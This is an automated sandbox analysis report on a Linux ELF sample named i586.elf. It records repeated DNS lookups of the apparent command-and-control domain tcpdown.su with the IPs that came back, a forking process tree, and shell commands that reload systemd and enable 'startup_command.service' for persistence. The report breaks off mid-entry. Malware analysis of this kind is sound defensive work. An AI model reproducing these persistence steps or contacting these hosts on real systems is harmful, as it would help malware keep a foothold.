Jan 2, 2025 08:51:56.263854027 CET	192.168.2.23	1.1.1.1	0x9b4f	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:01.264430046 CET	192.168.2.23	1.1.1.1	0x9b4f	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:06.267746925 CET	192.168.2.23	1.1.1.1	0x9b4f	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:11.271043062 CET	192.168.2.23	1.1.1.1	0x9b4f	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:18.672060013 CET	192.168.2.23	1.1.1.1	0xfe3a	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.680954933 CET	192.168.2.23	1.1.1.1	0xfe3a	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.687928915 CET	192.168.2.23	1.1.1.1	0xfe3a	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.702635050 CET	192.168.2.23	1.1.1.1	0xfe3a	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.711895943 CET	192.168.2.23	1.1.1.1	0xfe3a	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.719265938 CET	192.168.2.23	1.1.1.1	0x3806	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:23.722882986 CET	192.168.2.23	1.1.1.1	0x3806	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:28.724591970 CET	192.168.2.23	1.1.1.1	0x3806	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:33.727926016 CET	192.168.2.23	1.1.1.1	0x3806	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:38.731221914 CET	192.168.2.23	1.1.1.1	0x3806	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:45.573040962 CET	192.168.2.23	1.1.1.1	0x517d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.588066101 CET	192.168.2.23	1.1.1.1	0x517d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.595118046 CET	192.168.2.23	1.1.1.1	0x517d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.602444887 CET	192.168.2.23	1.1.1.1	0x517d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.617518902 CET	192.168.2.23	1.1.1.1	0x517d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.632164955 CET	192.168.2.23	1.1.1.1	0x7e00	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:50.633805990 CET	192.168.2.23	1.1.1.1	0x7e00	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:52:55.636940956 CET	192.168.2.23	1.1.1.1	0x7e00	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:00.640242100 CET	192.168.2.23	1.1.1.1	0x7e00	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:05.644213915 CET	192.168.2.23	1.1.1.1	0x7e00	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:13.614108086 CET	192.168.2.23	1.1.1.1	0x754d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.623044968 CET	192.168.2.23	1.1.1.1	0x754d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.637710094 CET	192.168.2.23	1.1.1.1	0x754d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.645109892 CET	192.168.2.23	1.1.1.1	0x754d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.653831005 CET	192.168.2.23	1.1.1.1	0x754d	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.668344975 CET	192.168.2.23	1.1.1.1	0xa7c	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:18.669735909 CET	192.168.2.23	1.1.1.1	0xa7c	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:23.674225092 CET	192.168.2.23	1.1.1.1	0xa7c	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:28.676347017 CET	192.168.2.23	1.1.1.1	0xa7c	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:33.679683924 CET	192.168.2.23	1.1.1.1	0xa7c	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:40.515492916 CET	192.168.2.23	1.1.1.1	0x846b	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.534512997 CET	192.168.2.23	1.1.1.1	0x846b	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.541649103 CET	192.168.2.23	1.1.1.1	0x846b	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.548872948 CET	192.168.2.23	1.1.1.1	0x846b	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.555959940 CET	192.168.2.23	1.1.1.1	0x846b	Standard query (0)	tcpdown.su	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.563287973 CET	192.168.2.23	1.1.1.1	0xa2c6	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:45.567794085 CET	192.168.2.23	1.1.1.1	0xa2c6	Standard query (0)	tcpdown.su	0	256	false
Jan 2, 2025 08:53:50.572230101 CET	192.168.2.23	1.1.1.1	0xa2c6	Standard query (0)	tcpdown.su	0	256	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 2, 2025 08:51:49.231483936 CET	1.1.1.1	192.168.2.23	0x5634	No error (0)	tcpdown.su		45.200.149.167	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.231483936 CET	1.1.1.1	192.168.2.23	0x5634	No error (0)	tcpdown.su		45.200.149.95	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.231483936 CET	1.1.1.1	192.168.2.23	0x5634	No error (0)	tcpdown.su		45.200.149.96	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.231483936 CET	1.1.1.1	192.168.2.23	0x5634	No error (0)	tcpdown.su		23.94.37.42	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.231483936 CET	1.1.1.1	192.168.2.23	0x5634	No error (0)	tcpdown.su		104.168.33.8	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.231483936 CET	1.1.1.1	192.168.2.23	0x5634	No error (0)	tcpdown.su		45.200.149.249	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.231483936 CET	1.1.1.1	192.168.2.23	0x5634	No error (0)	tcpdown.su		23.94.242.130	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.246720076 CET	1.1.1.1	192.168.2.23	0x3482	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.266180992 CET	1.1.1.1	192.168.2.23	0x3482	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.274998903 CET	1.1.1.1	192.168.2.23	0x3482	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.285022974 CET	1.1.1.1	192.168.2.23	0x3482	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:49.298796892 CET	1.1.1.1	192.168.2.23	0x3482	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.211858034 CET	1.1.1.1	192.168.2.23	0x5e07	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.219177961 CET	1.1.1.1	192.168.2.23	0x5e07	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.237888098 CET	1.1.1.1	192.168.2.23	0x5e07	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.252182961 CET	1.1.1.1	192.168.2.23	0x5e07	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:51:51.259376049 CET	1.1.1.1	192.168.2.23	0x5e07	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.680730104 CET	1.1.1.1	192.168.2.23	0xfe3a	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.687820911 CET	1.1.1.1	192.168.2.23	0xfe3a	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.702533007 CET	1.1.1.1	192.168.2.23	0xfe3a	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.711811066 CET	1.1.1.1	192.168.2.23	0xfe3a	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:18.719135046 CET	1.1.1.1	192.168.2.23	0xfe3a	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.587977886 CET	1.1.1.1	192.168.2.23	0x517d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.595063925 CET	1.1.1.1	192.168.2.23	0x517d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.602387905 CET	1.1.1.1	192.168.2.23	0x517d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.617456913 CET	1.1.1.1	192.168.2.23	0x517d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:52:45.632076025 CET	1.1.1.1	192.168.2.23	0x517d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.622845888 CET	1.1.1.1	192.168.2.23	0x754d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.637629032 CET	1.1.1.1	192.168.2.23	0x754d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.645045996 CET	1.1.1.1	192.168.2.23	0x754d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.653752089 CET	1.1.1.1	192.168.2.23	0x754d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:13.668256044 CET	1.1.1.1	192.168.2.23	0x754d	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.534445047 CET	1.1.1.1	192.168.2.23	0x846b	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.541518927 CET	1.1.1.1	192.168.2.23	0x846b	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.548779011 CET	1.1.1.1	192.168.2.23	0x846b	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.555852890 CET	1.1.1.1	192.168.2.23	0x846b	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false
Jan 2, 2025 08:53:40.563196898 CET	1.1.1.1	192.168.2.23	0x846b	Name error (3)	tcpdown.su	none	none	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: i586.elf PID: 6263, Parent PID: 6188

General

Start time (UTC):	07:51:46
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	/tmp/i586.elf
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Chronological Activities

Analysis Process: i586.elf PID: 6264, Parent PID: 6263

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Chronological Activities

Analysis Process: i586.elf PID: 6265, Parent PID: 6264

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Chronological Activities

Analysis Process: i586.elf PID: 6441, Parent PID: 6265

General

Start time (UTC):	07:51:55
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6442, Parent PID: 6265

General

Start time (UTC):	07:51:55
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6443, Parent PID: 6265

General

Start time (UTC):	07:51:55
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6444, Parent PID: 6265

General

Start time (UTC):	07:51:55
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6445, Parent PID: 6265

General

Start time (UTC):	07:51:58
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6450, Parent PID: 6265

General

Start time (UTC):	07:51:59
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6451, Parent PID: 6265

General

Start time (UTC):	07:51:59
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6452, Parent PID: 6265

General

Start time (UTC):	07:52:00
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6457, Parent PID: 6265

General

Start time (UTC):	07:52:04
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6458, Parent PID: 6265

General

Start time (UTC):	07:52:04
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6482, Parent PID: 6265

General

Start time (UTC):	07:52:09
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6484, Parent PID: 6265

General

Start time (UTC):	07:52:09
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6489, Parent PID: 6265

General

Start time (UTC):	07:52:14
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6491, Parent PID: 6265

General

Start time (UTC):	07:52:14
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6495, Parent PID: 6265

General

Start time (UTC):	07:52:19
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6496, Parent PID: 6265

General

Start time (UTC):	07:52:20
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6521, Parent PID: 6265

General

Start time (UTC):	07:52:26
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6523, Parent PID: 6265

General

Start time (UTC):	07:52:28
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6528, Parent PID: 6265

General

Start time (UTC):	07:52:34
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6530, Parent PID: 6265

General

Start time (UTC):	07:52:34
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6535, Parent PID: 6265

General

Start time (UTC):	07:52:39
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6536, Parent PID: 6265

General

Start time (UTC):	07:52:39
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6538, Parent PID: 6265

General

Start time (UTC):	07:52:43
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6544, Parent PID: 6265

General

Start time (UTC):	07:52:49
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6545, Parent PID: 6265

General

Start time (UTC):	07:52:49
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6549, Parent PID: 6265

General

Start time (UTC):	07:52:54
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6551, Parent PID: 6265

General

Start time (UTC):	07:52:58
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6555, Parent PID: 6265

General

Start time (UTC):	07:52:59
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6557, Parent PID: 6265

General

Start time (UTC):	07:52:59
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6563, Parent PID: 6265

General

Start time (UTC):	07:53:09
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6564, Parent PID: 6265

General

Start time (UTC):	07:53:09
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6566, Parent PID: 6265

General

Start time (UTC):	07:53:13
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6572, Parent PID: 6265

General

Start time (UTC):	07:53:19
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6574, Parent PID: 6265

General

Start time (UTC):	07:53:19
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6578, Parent PID: 6265

General

Start time (UTC):	07:53:24
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6580, Parent PID: 6265

General

Start time (UTC):	07:53:24
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6585, Parent PID: 6265

General

Start time (UTC):	07:53:29
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6586, Parent PID: 6265

General

Start time (UTC):	07:53:29
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6593, Parent PID: 6265

General

Start time (UTC):	07:53:39
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6594, Parent PID: 6265

General

Start time (UTC):	07:53:43
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6597, Parent PID: 6265

General

Start time (UTC):	07:53:44
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6599, Parent PID: 6265

General

Start time (UTC):	07:53:44
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6603, Parent PID: 6265

General

Start time (UTC):	07:53:49
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6605, Parent PID: 6265

General

Start time (UTC):	07:53:49
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Analysis Process: i586.elf PID: 6266, Parent PID: 6264

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Chronological Activities

Analysis Process: i586.elf PID: 6268, Parent PID: 6266

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Chronological Activities

Analysis Process: i586.elf PID: 6267, Parent PID: 6264

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Chronological Activities

Analysis Process: sh PID: 6267, Parent PID: 6264

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl daemon-reload"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6269, Parent PID: 6267

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 6269, Parent PID: 6267

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: i586.elf PID: 6284, Parent PID: 6264

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/tmp/i586.elf
Arguments:	-
File size:	70796 bytes
MD5 hash:	a4308d0cf09d2f1bc259627e7b91252d

Chronological Activities

Analysis Process: sh PID: 6284, Parent PID: 6264

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	sh -c "systemctl enable startup_command.service"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6285, Parent PID: 6284

General

Start time (UTC):	07:51:48
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 6285, Parent PID: 6284

General

Start time (UTC):	07:51:48
Start date (UTC):	02/01/2025
Path:	/usr/bin/systemctl
Arguments:	systemctl enable startup_command.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: systemd PID: 6271, Parent PID: 6270

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6271, Parent PID: 6270

General

Start time (UTC):	07:51:47
Start date (UTC):	02/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: systemd PID: 6287, Parent PID: 6286

General

Start time (UTC):	07:51:48
Start date (UTC):	02/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6287, Parent PID: 6286

General

Start time (UTC):	07:51:48
Start date (UTC):	02/01/2025
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: gnome-session-binary PID: 6295, Parent PID: 1477

General

Start time (UTC):	07:51:49
Start date (UTC):	02/01/2025
Path:	/usr/libexec/gnome-session-binary
Arguments:	-
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Chronological Activities

Analysis Process: sh PID: 6295, Parent PID: 1477

General

Start time (UTC):	07:51:49
Start date (UTC):	02/01/2025
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gsd-rfkill PID: 6295, Parent PID: 1477

General

Start time (UTC):	07:51:49
Start date (UTC):	02/01/2025
Path:	/usr/libexec/gsd-rfkill
Arguments:	/usr/libexec/gsd-rfkill
File size:	51808 bytes
MD5 hash:	88a16a3c0aba1759358c06215ecfb5cc

Chronological Activities

Analysis Process: systemd PID: 6302, Parent PID: 1

General

Start time (UTC):	07:51:51
Start date (UTC):	02/01/2025
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: systemd-hostnamed PID: 6302, Parent PID: 1

General

Start time (UTC):	07:51:51
Start date (UTC):	02/01/2025
Path:	/lib/systemd/systemd-hostnamed
Arguments:	/lib/systemd/systemd-hostnamed
File size:	35040 bytes
MD5 hash:	2cc8a5576629a2d5bd98e49a4b8bef65

Chronological Activities

Analysis Process: gdm3 PID: 6435, Parent PID: 1320

General

Start time (UTC):	07:51:51
